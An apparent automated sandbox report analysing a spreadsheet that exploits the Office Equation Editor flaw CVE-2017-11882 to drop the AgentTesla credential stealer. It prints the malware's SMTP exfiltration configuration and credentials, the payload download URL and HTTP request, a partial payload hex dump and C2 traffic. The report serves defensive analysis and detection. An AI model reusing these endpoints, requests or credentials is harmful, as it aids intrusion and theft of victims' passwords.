
Analysis Report DHL-Address.xlsx

Overview

General Information

Sample Name: DHL-Address.xlsx
Analysis ID: 339078
MD5: 5de2e8bdb620804fd22d76f1e9fedf6e
SHA1: 942ce29cd8138a1594ee416debf753d8eaa71528
SHA256: f5c3bea5b81c221bc8737bd8489154745c8d6644d7d19484218151f9a1c1f656
Tags: xlsx

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected AntiVM_3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1296 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2492 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1616 cmdline: 'C:\Users\Public\vbc.exe' MD5: B232B5C7754D932B07C0D47F934EFBFE)
      • vbc.exe (PID: 552 cmdline: C:\Users\Public\vbc.exe MD5: B232B5C7754D932B07C0D47F934EFBFE)

Malware Configuration

Threatname: Agenttesla

{"Username: ": "lhYwFYIE", "URL: ": "https://jUxNbkiTmoSYxyvoDh.net", "To: ": "", "ByHost: ": "smtp.privateemail.com:587", "Password: ": "KY7mWKFAl", "From: ": ""}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000005.00000002.2359575035.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(5 further entries collapsed in the original report)

Unpacked PEs

Source | Rule | Description | Author
5.2.vbc.exe.400000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 1616
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 192.210.214.178, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2492, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2492, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Source: Process started; Author: Florian Roth; Data: the same vbc.exe process-creation event as the CVE-2017-11882 match above (Image: C:\Users\Public\vbc.exe, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessId: 1616)

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://globuserinessserverfiletransferprotocol.mangospot.net/csrss/vbc.exe; Avira URL Cloud: Label: malware
Found malware configuration
Source: vbc.exe.552.5.memstr; Malware Configuration Extractor: Agenttesla {"Username: ": "lhYwFYIE", "URL: ": "https://jUxNbkiTmoSYxyvoDh.net", "To: ": "", "ByHost: ": "smtp.privateemail.com:587", "Password: ": "KY7mWKFAl", "From: ": ""}
Multi AV Scanner detection for submitted file
Source: DHL-Address.xlsx; Virustotal: Detection: 47%
Source: DHL-Address.xlsx; ReversingLabs: Detection: 48%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe; Joe Sandbox ML: detected
Machine Learning detection for sample
Source: DHL-Address.xlsx; Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Users\Public\vbc.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\Public\vbc.exe; Code function: 4x nop then jmp 00741064h
Source: global traffic; DNS query: name: globuserinessserverfiletransferprotocol.mangospot.net
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 192.210.214.178:80

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: https://jUxNbkiTmoSYxyvoDh.net
Source: global traffic; TCP traffic: 192.168.2.22:49166 -> 199.193.7.228:587
Source: global traffic; HTTP traffic detected:
HTTP/1.1 200 OK
Date: Wed, 13 Jan 2021 12:17:21 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
Last-Modified: Wed, 13 Jan 2021 09:01:13 GMT
ETag: "ce000-5b8c461903ba5"
Accept-Ranges: bytes
Content-Length: 843776
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d9 b6 fe 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 d6 0c 00 00 08 00 00 00 00 00 00 3e f4 0c 00 00 20 00 00 00 00 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec f3 0c 00 4f 00 00 00 00 00 0d 00 c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 d4 0c 00 00 20 00 00 00 d6 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 05 00 00 00 00 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0d 00 00 02 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 f4 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 3c 58 01 00 d8 a0 01 00 03 00 00 00 19 01 00 06 14 f9 02 00 d8 fa 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1e 00 00 0a 2a 26 00 02 28 1f 00 00 0a 00 2a ce 73 20 00 00 0a 80 01 00 00 04 73 21 00 00 0a 80 02 00 00 04 73 22 00 00 0a 80 03 00 00 04 73 23 00 00 0a 80 04 00 00 04 73 24 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 29 00 00 0a 0a 2b 00 06 2a 26 00 02 28 2a 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 2b 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2c 00 00 0a 6f 2d 00 00 0a 73 2e 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a
Source: Joe Sandbox View; IP Address: 199.193.7.228
Source: Joe Sandbox View; ASN Name: AS-COLOCROSSINGUS
Source: global traffic; HTTP traffic detected:
GET /csrss/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: globuserinessserverfiletransferprotocol.mangospot.net
Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5B636490.emf
Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp; String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown; DNS traffic detected: queries for: globuserinessserverfiletransferprotocol.mangospot.net
Source: vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp; String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp; String found in binary or memory: http://DynDns.comDynDNS
Source: vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp; String found in binary or memory: http://MLrjrg.com
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmp; String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp; String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp; String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp; String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp; String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp; String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp; String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp; String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp; String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: vbc.exe, 00000005.00000002.2359948941.000000000081D000.00000004.00000020.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: vbc.exe, 00000005.00000003.2357949309.0000000005158000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2359901613.00000000007AD000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.2359948941.000000000081D000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.5.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp; String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.sectigo.com0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
Source: vbc.exe, 00000005.00000002.2362156931.0000000005BD0000.00000002.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000005.00000002.2363028590.0000000006E50000.00000002.00000001.sdmp; String found in binary or memory: http://servername/isapibackend.dll
Source: vbc.exe, 00000005.00000002.2360554779.0000000002658000.00000004.00000001.sdmp; String found in binary or memory: http://smtp.privateemail.com
Source: vbc.exe, 00000005.00000002.2362156931.0000000005BD0000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp; String found in binary or memory: http://www.a-cert.at/certificate-policy.html0
Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp; String found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp; String found in binary or memory: http://www.a-cert.at0E
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.acabogacia.org/doc0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.acabogacia.org0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.ancert.com/cps0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp; String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.certifikat.dk/repository0
Source: vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmp; String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmp; String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp; String found in binary or memory: http://www.chambersign.org1
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.comsign.co.il/cps0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.crc.bg0
Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp; String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp; String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmp; String found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.disig.sk/ca0f
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.dnie.es/dpc0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.e-me.lv/repository0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.firmaprofesional.com0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp; String found in binary or memory: http://www.quovadis.bm0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp; String found in binary or memory: http://www.sk.ee/cps/0
Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp; String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.ssc.lt/cps03
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.trustcenter.de/guidelines0
Source: vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmp; String found in binary or memory: http://www.valicert.com/1
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: vbc.exe, 00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmp; String found in binary or memory: https://api.ipify.org%
Source: vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp; String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmp; String found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
Source: vbc.exe, 00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmp; String found in binary or memory: https://jUxNbkiTmoSYxyvoDh.net
Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp; String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
